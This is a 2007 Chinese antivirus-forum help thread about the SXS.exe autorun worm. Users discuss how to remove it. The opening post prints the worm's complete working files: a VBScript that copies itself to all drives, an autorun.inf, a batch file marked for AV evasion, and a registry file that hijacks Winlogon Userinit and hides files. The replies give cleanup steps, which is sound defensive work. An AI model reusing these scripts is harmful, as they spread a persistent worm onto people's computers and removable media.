瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » SXS.exe新变种 求助~!!!
dxbstc - 2007-5-14 1:32:00
今天遇到一个病毒 姑且叫他 SXS病毒
  
  首先杀掉怀疑进程 再删注册表项(查找WScript.exe\sxs.exe 全部删除) 再删文件 重启 病毒重新出现.
  不知道我漏删了什么.
  下面是每个盘生成的四个文件.
  autorun.bat 文件
  
  @echo off
  if exist .\autorun.reg regedit /s .\autorun.reg
  if not "%1"=="" goto open
  if exist autorun.vbs start WScript.exe autorun.vbs&exit
  
  ';免杀
  if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
  ';免杀
  
  
  
  
  
  :open
  if not "%1"=="Open" goto next
  start explorer .\
  exit
  :next
  if not "%1"=="Over" goto :next2
  exit
  :next2
  if "%1"=="-" attrib -s -a -h -r %2\autorun.*
  if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
  if "%1"=="+" attrib +s +a +h +r %2\autorun.*
  if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
  :end
  
  
  AutoRun.inf 文件
  
  [autorun]
  shell\open=打开(&O)
  shell\open\Command=WScript.exe .\autorun.vbs
  shell\open\Default=1
  shell\explore=资源管理器(&X)
  shell\explore\Command=WScript.exe .\autorun.vbs
  
  open=RavMon.exe
  shellEXEcute=RavMon.exe
  shell\Auto\command=RavMon.exe
  
  
  
  autorun.reg 文件
  
  
  Windows Registry Editor Version 5.00
  
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
  "Userinit"="userinit.exe,autorun.bat"
  
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
  "autorun"="sxs.exe"
  
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
  "ShowSuperHidden"=dword:00000000
  "Hidden"=dword:00000002
  
  
  autorun.vbs 文件
  on error resume next
  Set WshShell =CreateObject("WScript.Shell")
  
  if 1=0 then
  else
  For i=1 to 1
  set Of = CreateObject("Scripting.FileSystemObject")
  set dir = Of.GetSpecialFolder(1)
  
  Set dc = Of.Drives
  if WScript.ScriptFullName=dir&"\autorun.vbs" then
  isdir=true
  else
  a=WshShell.Run("autorun.bat Open" ,0,False)
  isdir=false
  end if
  For Each d In dc
  If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
  a=WshShell.Run("autorun.bat - "&d ,0,True)
  if isdir then
  Of.CopyFile dir&"\autorun.bat",d&"\",True
  Of.CopyFile dir&"\sxs.exe",d&"\",True
  Of.CopyFile dir&"\autorun.inf",d&"\",True
  Of.CopyFile dir&"\autorun.reg",d&"\",True
  Of.CopyFile dir&"\autorun.vbs",d&"\",True
  else
  Of.CopyFile "autorun.bat",d&"\",True
  Of.CopyFile "sxs.exe",d&"\",True
  Of.CopyFile "autorun.inf",d&"\",True
  Of.CopyFile "autorun.reg",d&"\",True
  Of.CopyFile "autorun.vbs",d&"\",True
  end if
  a=WshShell.Run("autorun.bat + "&d ,0,True)
  End If
  next
  if isdir then
  wscript.sleep 60000
  i=0
  else
  a=WshShell.Run("autorun.bat - "&dir ,0,True)
  Of.CopyFile "autorun.bat",dir&"\",True
  Of.CopyFile "sxs.exe",dir&"\",True
  Of.CopyFile "autorun.inf",dir&"\",True
  Of.CopyFile "autorun.reg",dir&"\",True
  Of.CopyFile "autorun.vbs",dir&"\",True
  a=WshShell.Run("autorun.bat + "&dir ,0,True)
  End if
  next
  End if
dxbstc - 2007-5-14 1:38:00
我被这个东西整不行了。谁救救我吧~
星月来了 - 2007-5-14 1:43:00
先搜索注册表里的涉及的所有注册项(你最好先备份下),然后试试,将冰刃(1.2版本的)改名运行起来,然后用冰刃禁止进程创建,删除所有涉及的注册表项和所有磁盘里的你看到的那四个文件。

试试吧。

我睡了。

还不行,你那系统里就还有其他的东西,那时再扫SRENG日志吧。

发这里。等明天他们来看。
sanjingshou - 2007-5-14 2:00:00
有以下几个位置:
1.%SYSTEMROOT%\system32\autorun.vbs
  %SYSTEMROOT%\system32\autorun.reg
  %SYSTEMROOT%\system32\autorun.bat
  %SYSTEMROOT%\system32\autorun.inf
  %SYSTEMROOT%\system32\sxs.exe
2.每个硬盘
3.修改注册表:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
  "Userinit"="userinit.exe,autorun.bat"
为:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
  "Userinit"="userinit.exe,"

删除:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
  "autorun"="sxs.exe"

shell\open=打开(&O)
  shell\open\Command=WScript.exe .\autorun.vbs
  shell\open\Default=1
  shell\explore=资源管理器(&X)
  shell\explore\Command=WScript.exe .\autorun.vbs
如果运行以上,病毒会再出现---和我上次看到的有点不一样
建议使用SRENG和ICESWORD配合使用。。。

把每个病毒文件删除就不会出现再次感染的情况了,我处理过一次这类病毒,基本是一样的
dxbstc - 2007-5-14 2:28:00
病毒不运行时勾去显示隐藏文件有作用,但是一打开盘符(用右键点打开)或运行资源管理器,马上就取消显示隐藏文件。并且不显示受保护的系统文件。
冰刃分析进程我分析一晚上嫩没找到。
。。。。救命啊~我看最近网上好像这个也挺泛滥的。。。
帮忙出个主意。。。
dxbstc - 2007-5-14 4:14:00
我已经用文件粉碎器消灭了它。
不容易啊。
提醒其他中的XDJM,先关闭那个该死的W进程。用文件粉碎器!然后配合SRENG把启动项注册表给修复。
再用卡卡把启动项里的AUTORUN去掉。。。
哈哈!我太聪明了!

哪位大大整个这个东西的免疫文件。我怕下次运气不好,弄 不掉了。。
孤独更可靠 - 2007-5-14 8:17:00
还有样本么.

比如说.

漏了一个...
姑苏残月 - 2007-5-14 8:38:00
前几天就见过了.好象有反复感染的前兆.不好收拾.
个人建议删除文件等操作,请在安全模式下操作.如果能在PE环境下操作,效果更好
天月来了 - 2007-5-14 9:17:00
这毒,确实难处理,建议有这毒的,都常向各家杀软上报,或许还能有机会修复感染的文件。

同时也能加强杀软的监控能力。

sanjingshou - 2007-5-14 22:05:00
引用:
【dxbstc的贴子】病毒不运行时勾去显示隐藏文件有作用,但是一打开盘符(用右键点打开)或运行资源管理器,马上就取消显示隐藏文件。并且不显示受保护的系统文件。
冰刃分析进程我分析一晚上嫩没找到。
。。。。救命啊~我看最近网上好像这个也挺泛滥的。。。
帮忙出个主意。。。
………………

那就不要运行,我的电脑,资源管理器,CMD
使用ICESWORD把我说的几个位置的病毒文件删除掉
再修改其注册表,就可以恢复
sanjingshou - 2007-5-14 22:07:00
引用:
【孤独更可靠的贴子】还有样本么.

比如说.

漏了一个...
………………

我有样本,不过是autorun.reg,autorun.bat,autorun.inf,autorun.vbs
病毒就是靠这几个文件才变的不好处理的
里面的内容,和楼主写出来的基本是一致的
1
查看完整版本: SXS.exe新变种 求助~!!!
© 2000 - 2026 Rising Corp. Ltd.